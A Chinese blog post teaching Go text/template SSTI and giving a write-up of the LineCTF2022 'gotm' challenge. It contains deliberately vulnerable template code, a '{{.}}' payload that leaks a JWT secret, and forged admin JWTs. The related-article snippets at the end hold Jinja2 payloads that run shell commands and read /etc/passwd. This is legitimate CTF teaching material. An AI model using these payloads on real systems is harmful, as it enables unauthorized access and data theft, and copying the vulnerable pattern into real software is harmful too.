[Go语言]SSTI从0到1

已于 2023-11-11 19:30:53 修改
阅读量610 收藏
点赞数 5
分类专栏: CTF web安全 Go语言从0到1 文章标签: golang 开发语言 web安全 CTF
于 2023-11-11 19:29:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Elite__zhb/article/details/134352384
版权
web安全 同时被 3 个专栏收录
29 篇文章 6 订阅
订阅专栏
CTF
19 篇文章 0 订阅
订阅专栏
Go语言从0到1
2 篇文章 0 订阅
订阅专栏

[Go语言]SSTI从0到1

1.Go-web基础及示例

package main
import (
	"fmt"
	"net/http"
)
func sayHello(w http.ResponseWriter, r *http.Request) { // 定义一个
	fmt.Fprintln(w, "hello world!")
}
func main() {
	http.HandleFunc("/hello", sayHello)  //浏览器访问/hello,将会转到sayHello去处理
	http.ListenAndServe(":8888", nil) // 监听端口并处理请求
}

其中 “net/http” 是Go自带的实现web服务的模块,可以处理http请求,其中http.HandleFunc是用来绑定路由函数,相当于python的flask的app.route函数

然后就是路由函数sayHello了,这个函数接受两个参数,其中 w 是web接口参数,该变量可发送到前端web页面,r 是http报文参数,用于存放http请求的UA头,表单数据等信息

然后 fmt.Fprintln 函数是用于输出在器(io.Writer)中例如web接口

这里输出 “hello world”,如图所示

在这里插入图片描述

2.参数处理

我们将sayHello函数改动如下

func sayHello(w http.ResponseWriter, r *http.Request) {
  var name = r.FormValue("name")
  var para = ("hello," + name + "!")
  fmt.Fprintln(w, para)
}

r.FormValue为接收表单数据的数组,包括GET与POST

处理表单请求的方法如下

1.直接获得

PostFormValue或FormValue方法

前者只能解析Post请求

2.ParseForm()方法间接获得

r.ParseForm()  解析请求的主体,化为键值对组合

键值对会被存储在 r.Form 和 r.PostForm 字段中

  • r.Form 是一个 url.Values 类型,它表示 URL 查询参数和 POST 表单字段的集合。可以通过 r.Form.Get(key)、r.Form[key] 或 r.FormValue(key) 方法来获取表单字段的值。
  • r.PostForm 是一个 url.Values 类型,它只包含 POST 表单字段的数据。与 r.Form 不同的是,r.PostForm 不会自动解析 URL 查询参数或其他非 POST 提交的数据。

示例如下:

3.模版引擎

GO语言提供了两个模板包,一个是 html/template 模块,另一个是 text/template 模块,其中text/template模板引擎与Go语言的SSTI有关

3.1 text/template

示例:

package main

import (
    "fmt"
    "net/http"
    "strings"
    "text/template"
)

type User struct {
    Id     int
    Name   string
    Passwd string
}

func StringTplExam(w http.ResponseWriter, r *http.Request) {
    user := &User{1, "admin", "123456"}
    r.ParseForm()
    arg := strings.Join(r.PostForm["name"], "")
    tpl1 := fmt.Sprintf(`<h1>Hi, ` + arg + `</h1> Your name is ` + arg + `!`)
    html, err := template.New("login").Parse(tpl1)
    html = template.Must(html, err)
    html.Execute(w, user)
}

func main() {
    server := http.Server{
        Addr: "127.0.0.1:8080",
    }
    http.HandleFunc("/login", StringTplExam)
    server.ListenAndServe()
}

首先讲解一下这段代码,它使用了 “text/template” 模板引擎,该模板引擎并没有对传入的数据进行html编码,可导致SSTi,然后定义了一个User结构体,用于给模版传参

type User struct {
    Id     int
    Name   string
    Passwd string
}

然后通过fmt.Sprintf函数将传入的name参数拼接到模版当中,再通过以下语句,利用template.New(“login”)创建了一个名为 login 的模板,然后使用 Parse(tpl1) 方法,被作为模版的字符串存储到login模板中

 html, err := template.New("login").Parse(tpl1)

其中html就代表刚才创建的login模板,然后err代表创建模板过程中的报错信息(一般不会有),然后通过以下语句判断模板是否创建成功,若创建成功则继续运行,失败则退出程序并报错

html = template.Must(html, err)

最后通过 Execute 方法进行模版翻译,将user结构体中的值翻译到html的模板中,然后输出到w接口,也就是web前端

html.Execute(w, user)

3.2 SSTI

我们以上面的web源码为例

首先访问 login 路由,然后POST传入一个参数,可以看到回显正常
在这里插入图片描述

我们再传入 name={{.Name}},其中双重大括号为该模板引擎的占位符,可以被翻译,我们使用 {{.参数名}} 的格式,可以访问构建模版时所传入的参数

type User struct {
    Id     int
    Name   string
    Passwd string
}

user := &User{1, "admin", "123456"}

如图所示
在这里插入图片描述

4.[LineCTF2022]gotm

1.题目源码

main.go

package main

import (
	"encoding/json"
	"fmt"
	"log"
	"net/http"
	"os"
	"text/template"

	"github.com/golang-jwt/jwt"
)

type Account struct {
	id         string
	pw         string
	is_admin   bool
	secret_key string
}

type AccountClaims struct {
	Id       string `json:"id"`
	Is_admin bool   `json:"is_admin"`
	jwt.StandardClaims
}

type Resp struct {
	Status bool   `json:"status"`
	Msg    string `json:"msg"`
}

type TokenResp struct {
	Status bool   `json:"status"`
	Token  string `json:"token"`
}

var acc []Account
var secret_key = os.Getenv("KEY")
var flag = os.Getenv("FLAG")
var admin_id = os.Getenv("ADMIN_ID")
var admin_pw = os.Getenv("ADMIN_PW")

func clear_account() {
	acc = acc[:1]
}

func get_account(uid string) Account {
	for i := range acc {
		if acc[i].id == uid {
			return acc[i]
		}
	}
	return Account{}
}

func jwt_encode(id string, is_admin bool) (string, error) {
	claims := AccountClaims{
		id, is_admin, jwt.StandardClaims{},
	}
	token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
	return token.SignedString([]byte(secret_key))
}

func jwt_decode(s string) (string, bool) {
	token, err := jwt.ParseWithClaims(s, &AccountClaims{}, func(token *jwt.Token) (interface{}, error) {
		return []byte(secret_key), nil
	})
	if err != nil {
		fmt.Println(err)
		return "", false
	}
	if claims, ok := token.Claims.(*AccountClaims); ok && token.Valid {
		return claims.Id, claims.Is_admin
	}
	return "", false
}

func auth_handler(w http.ResponseWriter, r *http.Request) {
	uid := r.FormValue("id")
	upw := r.FormValue("pw")
	if uid == "" || upw == "" {
		return
	}
	if len(acc) > 1024 {
		clear_account()
	}
	user_acc := get_account(uid)
	if user_acc.id != "" && user_acc.pw == upw {
		token, err := jwt_encode(user_acc.id, user_acc.is_admin)
		if err != nil {
			return
		}
		p := TokenResp{true, token}
		res, err := json.Marshal(p)
		if err != nil {
		}
		w.Write(res)
		return
	}
	w.WriteHeader(http.StatusForbidden)
	return
}
func regist_handler(w http.ResponseWriter, r *http.Request) {
	uid := r.FormValue("id")
	upw := r.FormValue("pw")

	if uid == "" || upw == "" {
		return
	}
	if get_account(uid).id != "" {
		w.WriteHeader(http.StatusForbidden)
		return
	}
	if len(acc) > 4 {
		clear_account()
	}
	new_acc := Account{uid, upw, false, secret_key}
	acc = append(acc, new_acc)
	p := Resp{true, ""}
	res, err := json.Marshal(p)
	if err != nil {
	}
	w.Write(res)
	return
}
func flag_handler(w http.ResponseWriter, r *http.Request) {
	token := r.Header.Get("X-Token")
	if token != "" {
		id, is_admin := jwt_decode(token)
		if is_admin == true {
			p := Resp{true, "Hi " + id + ", flag is " + flag}
			res, err := json.Marshal(p)
			if err != nil {
			}
			w.Write(res)
			return
		} else {
			w.WriteHeader(http.StatusForbidden)
			return
		}
	}
}
func root_handler(w http.ResponseWriter, r *http.Request) {
	token := r.Header.Get("X-Token")
	if token != "" {
		id, _ := jwt_decode(token)
		acc := get_account(id)
		tpl, err := template.New("").Parse("Logged in as " + acc.id)
		if err != nil {
		}
		tpl.Execute(w, &acc)
	} else {

		return
	}
}
func main() {
	admin := Account{admin_id, admin_pw, true, secret_key}
	acc = append(acc, admin)
	http.HandleFunc("/", root_handler)
	http.HandleFunc("/auth", auth_handler)
	http.HandleFunc("/flag", flag_handler)
	http.HandleFunc("/regist", regist_handler)
	log.Fatal(http.ListenAndServe("0.0.0.0:11000", nil))
}

2.WP

审计代码可得该web网站共有以下路由

  http.HandleFunc("/", root_handler) //模板

  http.HandleFunc("/auth", auth_handler)  //登陆

  http.HandleFunc("/flag", flag_handler)

  http.HandleFunc("/regist", regist_handler)  //注册

先分析下flag路由

id, is_admin := jwt_decode(token)
		if is_admin == true {
			p := Resp{true, "Hi " + id + ", flag is " + flag}
			res, err := json.Marshal(p)
			if err != nil {
			}

发现需要进行jwt伪造,让 is_admin 的值为ture

访问regist路由注册账号,形成原始jwt

在这里插入图片描述

访问auth路由,登陆刚才注册的账号,得到一段jwt加密的字符串

在这里插入图片描述

对其解密得,is_admin的值默认为false

在这里插入图片描述

由此可得我们只需添加 X-Token 的请求头即可,内容为修改后的jwt字符串,接下来我们需要通过根路由进行SSTI,得到jwt加密的密钥,然后进行伪造

token := r.Header.Get("X-Token")

分析根路由可得,注入点在jwt加密数据的id部分

if token != "" {
		id, _ := jwt_decode(token)
		acc := get_account(id)
		tpl, err := template.New("").Parse("Logged in as " + acc.id)
		if err != nil {
		}
		tpl.Execute(w, &acc)
	}

我们再次访问regist路由,发送以下payload,来获得acc结构体的所有信息

regist?id={{.}}&pw=123
//不能使用{{.secret_key}}注入得到key字段,因为root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空

访问author路由,得到SSTI的密文如下

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOmZhbHNlfQ.0Lz_3fTyhGxWGwZnw3hM_5TzDfrk0oULzLWF4rRfMss

再次访问根路由,并添加 X-Token 请求头,值为刚才的jwt密文,得到jwt加密密钥(this_is_f4Ke_key)

在这里插入图片描述

回到 jwt.io网站,将is_admin的值设为true,并加密

在这里插入图片描述

得到密文

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Int7Ln19IiwiaXNfYWRtaW4iOnRydWV9.3OXFk-f_S2XqPdzHnl0esmJQXuTSXuA1IbpaGOMyvWo

访问flag路由添加X-Token请求头

在这里插入图片描述

成功得到flag

Elitewa
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ssti
2h4ox1n9
05-23 608
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5334
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
浅学Go下的ssti
YJ_12340的博客
05-09 1233
template之所以称作为模板的原因就是其由静态内容和动态内容所组成,可以根据动态内容的变化而生成不同的内容信息交由客户端,以下即一个简单例子模板内容 Hello, {{.Name}} Welcome to go web programming…期待输出 Hello, liumiaocn Welcome to go web programming…
浅学Go下的ssti漏洞问题
蚁景网安学院
11-23 1402
作为强类型的静态语言golang安全属性从编译过程就能够避免大多数安全问题,一般来说也唯有依赖库和开发者自己所编写的操作漏洞,才有可能形成漏洞利用点,在本文,主要学习探讨一下golang的一些ssti模板注入问题。
CTF—Go题目复现
Sentiment的博客
06-23 2861
一道Go的模板注入由于没了解过Go的SSTI所以先简单看下:go语言快速入门:template模板 · Golang语言社区 · 看云 (kancloud.cn)Go SSTI初探 | tyskillのBloggo的SSTI漏洞成因与模板语法和jinja2差不多,都用到了,通过{{.}}我们可以获得到作用域Demo 当使用{{.}}时,会获取person结构体中的所有属性,所以在经过Execute渲染后,便会输出: 除此外若想获取单个属性也可以用 结果 复现 主要有几个路由 先看的flagHandler 中
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI
03-09
SSTI
fenjing工具,ssti
最新发布
12-17
fenjing一把梭哈ssti,简单绕过waf
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
当用户输入直接连接到模板中而不是作为数据传递时,可能会发生服务器端模板注入攻击。 这使攻击者可以注入任意模板指令以操纵模板引擎,从而经常使攻击者能够完全控制服务器。 顾名思义,服务器端模板注入有效负载...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入(SSTI)1
07-25
Apache OfBiz 服务器端模板注入(SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行
golang制作的模糊器,用于查找xss,lfi,rce,ssti等问题,该问题可通过更改内容长度来检测问题,并使用签名进行验证-Golang开发
05-26
golang制作的模糊器,用于查找xss,lfi,rce,ssti等问题,该问题可通过更改内容长度来检测问题,并使用签名进行验证。 什么是BountyIt? 用golang制作的模糊器,用于查找xss,lfi,rce,ssti等问题,该问题可通过更改内容长度来检测问题,并使用签名进行验证。 帮助-grep字符串指定自定义grepping签名。 Ex -grep signatures.txt -header字符串如果需要,添加任何自定义标题。 例如:-header“ Cookie:Session = 12cbcx ....”-方法字符串如果需要,请添加方法名称。 例如:-方法PUT。 缺省的“ GET”(缺省的“ GET”)-p字符串送入列表
关于Go语言下的模板注入3
woshiyanfu的博客
09-26 42
这差不多应该是模板注入系列的最后一篇文章了,最近去打了华东北赛区的线下,结果被打爆了,java和go让不会的孩子太坐牢了,于是就想到了,最后一篇有关模板注入的系列就以go语言结尾吧,同样也是开头,暑假开始学java和go。
2022DASCTF MAY 出题人挑战赛 web复现
errorr0
05-23 1016
DASCTF
CTF SSTI 一些记录
3569
10-13 5810
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
2022DASCTF MAY 出题人挑战赛
Sk1y的博客
05-26 652
2022DASCTF MAY 出题人挑战赛 文章目录2022DASCTF MAY 出题人挑战赛Power魔法浏览器 Power Cookie发包,回显中有个 在cookie加一个 admin=1 得到flag DASCTF{ad2e3900-06dd-4b04-9cec-1a8878a3777f} 魔法浏览器 f12查看 然后修改报文 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
有关于服务端模板注入(ssti攻击)——BUUCTF - easy_tornado
ancan8807的博客
09-07 1095
打开题目出现3个链接 /flag.txt 中提示flag in /fllllllllllllag /welcome.txt 中提示 render /hints.txt 中提示 md5(cookie_secret+md5(filename)) 直接访问/fllllllllllllag失败。 百度了render可知,render是python的一个模板,他们的url都是...
详解SSTI模板注入
LYJ20010728的博客
09-09 3830
详解SSTI模板注入SSTI简介常见的模板引擎PHPJAVAPYTHONRUBYGOLANGSSTI产生的原因常用检测工具 TplmapFlask/Jinja模板引擎的相关绕过Flask简介demo漏洞代码基础知识沙盒逃逸Python的内建函数名称空间类继承寻找Python-SSTI攻击载荷的过程攻击载荷过程常用的目标函数常见的中间对象fuzz可利用类脚本服务端fuzzPython常用的命令执行方式Python-Web框架配置文件TornadoflaksFlask过滤器定义使用方式用的过滤器模块查找脚本常见
安全漏洞】DedeCMS-5.8.1 SSTI模板注入导致RCE
HBohan的博客
11-20 1960
漏洞类型 SSTI RCE 利用条件 影响范围应用 漏洞概述 2021年9月30日,国外安全研究人员Steven Seeley披露了最新的DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导致的RCE漏洞,由于SQL注入漏洞利用条件极为苛刻,故这里只对该SSTI注入漏洞进行简要分析复现 漏环境搭建 【技术学习资料】 漏洞复现 这里使用phpstudy来搭建环境 网站前台:http://192.168.59.1/index.php?upcache=1 网站后台: http://192.
适合小白学的基础知识—SSTI漏洞学习
HBohan的博客
07-30 997
SSTI 简介 MVC MVC是一种框架型模式,全名是Model View Controller。 即模型(model)-视图(view)-控制器(controller) 在MVC的指导下开发中用一种业务逻辑、数据、界面显示分离的方法组织代码,将业务逻辑聚集到一个部件里面,在改进和个性化定制界面及用户交互的同时,得到更好的开发和维护效率。 在MVC框架中,用户的输入通过 View 接收,交给 Controller ,然后由 Controller 调用 Model 或者其他的 Controller 进行处理.
bugkuctfweb题解simple_ssti_1
06-28
### 回答1: simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符串嵌入到一个 Flask 模板中,并将渲染后的页面返回给用户。攻击者可以在输入框中输入包含 SSTI 代码的字符串,从而在服务器上执行任意代码。 为了解决这个问题,可以使用 Flask 的 Jinja2 模板引擎提供的 safe 过滤器来过滤用户输入,防止用户输入的字符串被作为代码执行。或者在编写模板时,尽量避免使用可执行的表达式,而是将变量放在 HTML 标签中输出。 这个题目是一个很好的 SSTI 注入练习题目,可以帮助我们了解 SSTI 注入的危害和防御方法。 ### 回答2: Simple_ssti_1是BugsKiller CTF比赛中的一道Web题目,考察的知识点是SSTI(Server-Side Template Injection)模板注入,需要寻找漏洞点并利用SSTI漏洞构造payload,达到读取/执行任意代码的目的。 首先,我们下载题目附件simple_ssti_1.zip,获得题目源代码及相关文件。查看代码,发现以下几点: 1. 程序的入口是index.php文件,包含了一个GET参数tpl,可控注入的点在这里。 2. 向模板文件simple_ssti_1_template.html中传入tpl参数,在该文件中执行了{{tpl}}操作,将tpl参数进行了模板渲染。 3. SSTI的注入点在于,如果我们的攻击payload中包含了一些特殊模板语法的操作符,如{{3*3}}、{{config}}等,这些操作符会被解析器自动执行,导致代码注入进去。 从上述代码的分析可知,我们首先需要构造包含有SSTI操作符的payload才能进行下一步的SSTI构造。继续观察代码,我们发现一个{{config}}变量被渲染在了simple_ssti_1_template.html的头部中,我们可以通过注入payload来构造一个同名的config变量,从而读取根目录的敏感文件/flag.php。 构造payload : {{config.__class__.__init__.__globals__['os'].popen('cat flag.php').read()}} 这个SSTI注入的payload实现了直接运行命令cat flag.php然后读取文件的操作。注入的{{config}}变量实际上是一个自定义的config字典,含有很多内置函数,比如__class__.__init__.__globals__,它的作用是获取全局变量__builtins__,然后通过这个全局字典来获取os模块,之后就可以使用os模块的popen函数运行cat命令来获取flag.php文件内容了。 最终的payload为: ?tpl={{config.__class__.__init__.__globals__['os'].popen('cat /flag.php').read()}} 再通过浏览器发送带有payload的GET请求,就可以读取/root/flag.php中的flag了。 ### 回答3: 简单SSTI 1是一道基于SSTI漏洞的Web安全挑战题目,该题的难度属于初级。本题需要掌握一定的SSTI漏洞的相关知识和技巧,以及对模板中的变量注入点的识别和利用能力。 首先,我们尝试在输入框中输入简单的Python表达式,例如{{2+2}},并提交请求,发现得到的响应结果为4,表明该网站存在SSTI漏洞。接着,我们可以构造一些特殊的表达式进行测试,例如{{123456789}}, {{2**100}}, {{'hello ' + 'world'}}, 发现均能得到正确的响应结果。 接着我们需要进行变量注入点的识别和利用,这里,我们可以通过利用flask框架中的特殊变量,例如request、g等来实现变量注入,例如{{config}},可以获得flask的配置信息,{{request}}可以获得当前请求的一些信息。需要注意的是,在实战中,这些利用方式可能会受到服务器的限制,无法完全实现。 最后,我们需要尝试获取敏感信息或者升级我们的权限,例如{{''.__class__.mro()[1].__subclasses__()[71]('/etc/passwd').read()}},可以获取到服务器上/etc/passwd文件的内容。 总之,简单的SSTI漏洞需要熟练掌握SSTI漏洞的相关知识和技巧,识别变量注入点并利用它们获取敏感信息和升级权限,可以通过CTF题目学习,提高自己的Web安全攻防能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Elitewa

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值